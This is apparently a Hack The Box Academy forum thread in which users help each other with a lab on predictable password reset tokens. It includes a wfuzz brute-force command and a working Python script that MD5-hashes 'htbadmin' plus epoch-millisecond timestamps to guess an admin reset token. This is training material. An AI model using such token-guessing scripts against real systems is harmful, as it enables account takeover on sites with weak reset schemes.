Academy Broken Auththentication Predictable reset token question1 help please

HTB Content Academy
1

nvm

if anyone else is stuck on this:

I used this https://www.epochconverter.com/ to get the epoch time in milliseconds, 2 seconds before and after the time it says the token was created.

I created a token list with the modified reset token_time.py and used wfuzz to find the correct token(I stole the command and modified script off some other posts):

wfuzz -c -w tokens.list --hs “Wrong token” -d “token=FUZZ&submit=check” http://83.136.252.32:46793/question1/

if you need help ask.

2

Hey @Neurosploit

I am trying your method and still unable to find the flag for some reason.

Would you mind telling me more about your script and how does it operate.

Thank You

–new_user_001

3

you gotta change the start at end time 2 seconds before and after the time that your token was generated.

I used this site to get the time:

https://www.epochconverter.com/ be sure to use the Timestamp in milliseconds

The script basically just makes requests to the specified url and adds htbadmin + the epoch in miliseconds and md5 hashes it to try to find the admin token. The admin token is htbadmin and the time in epoch miliseconds md5 hashed, the tricky part is you don’t know when the token was created which is why we do 2 seconds before and after the time that htbuser token was generated.

did you change the url to your url and the time to yours?

if you read the hint it says Convert the displayed date to epoch time in milliseconds and use it in the script you will create. so convert the time you got to epoch time in milliseconds. Don’t forget 2 seconds before and after your time and then place that time in the script…

4

Thank You for your response and guidance, I updated my code accordingly, and it’s currently running as I am writing this.

Below is the code I am using for reference, not sure if there is any error but it’s not showing any error for now.

“”"
from hashlib import md5
import requests
from sys import exit
from time import time

url = “http://94.237.49.212:47517/question1/

now = 1717064740000
start_time = 1717064738000 #-2 seconds
end_time = 1717064742000 #+2 seconds
fail_text = “Wrong token”
username = “htbadmin”

for x in range(start_time, end_time + 1):
timestamp = str(x)
md5_token = md5((username+timestamp).encode()).hexdigest()
data = {
“submit”: “check”,
“token”: md5_token
}
print(“checking {} {}”.format(str(x), md5_token))
res = requests.post(url, data=data)
if not fail_text in res.text:
print(res.text)
print(“[*] Congratulations! raw reply printed before”)
exit()

“”"

Kind Regards

–new_user_001